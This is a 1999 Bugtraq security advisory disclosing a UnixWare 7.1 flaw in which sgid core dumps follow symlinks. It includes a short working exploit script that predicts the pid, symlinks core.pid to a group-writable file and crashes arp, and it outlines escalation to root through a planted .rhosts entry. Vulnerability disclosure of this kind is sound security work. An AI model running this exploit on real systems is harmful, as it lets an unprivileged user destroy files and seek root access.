Bugtraq mailing list archives
UnixWare coredumps follow symlinks
From: btellier () USA NET (Brock Tellier)
Date: Thu, 2 Dec 1999 19:07:20 MST
Greetings, OVERVIEW Any user may cause system files to be overwritten with coredump data. A full root compromise may be possible. BACKGROUND All my testing was done on UnixWare 7.1 though I would imagine 7.x is vulnerable as well. DETAILS UnixWare's sgid binaries are allowed to dump core (but suids are not). By "calculating" the pid of the sgid binary we will call, we can create a symlink from ./core.pid to any file which would be writable by the running group. Many of the sgid binaries are sgid-sys, an extremely sensitive gid to be able to play around with. My arp exploit attached below demonstrates how one would overwrite a file using this vulnerability. Why is a root compromise possible? Well, assuming that we could somehow get "+ +" on a line by itself in the corefile, we could place this into the .rhosts file of some group writable directory/.rhosts. Gaining the additional privileges of any system account is usually a fast ticket to root. EXPLOIT #!/bin/sh #### # Exploit for UnixWare 7.1 - sgid coredumps follow symlinks. # Guessing pid is trivial. Any sgid program which will coredump can be used # -Brock Tellier, btellier () usa net #### pid=`expr $$ + 4`; ln -s /path/to/sys/group/writable/file core.$pid /usr/sbin/arp `perl -e "print 'A' x 10000"` Brock Tellier UNIX Systems Administrator Chicago, IL, USA btellier () usa net ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1
Current thread:
- Re: [Re: Several FreeBSD-3.3 vulnerabilities] Brock Tellier (Dec 01)
- Re: [Re: Several FreeBSD-3.3 vulnerabilities] Robert Watson (Dec 02)
- UnixWare coredumps follow symlinks Brock Tellier (Dec 02)
- Apologies to USSRLABS Arvel Hathcock (Dec 03)
- idlescan (ip.id portscanner) LiquidK (Dec 03)
- Re: idlescan (ip.id portscanner) marvin () NSS NU (Dec 04)
- Re: Security Advisory: Buffer overflow in RSAREF2 Niels Provos (Dec 04)
- UnixWare pkg* command exploits Brock Tellier (Dec 04)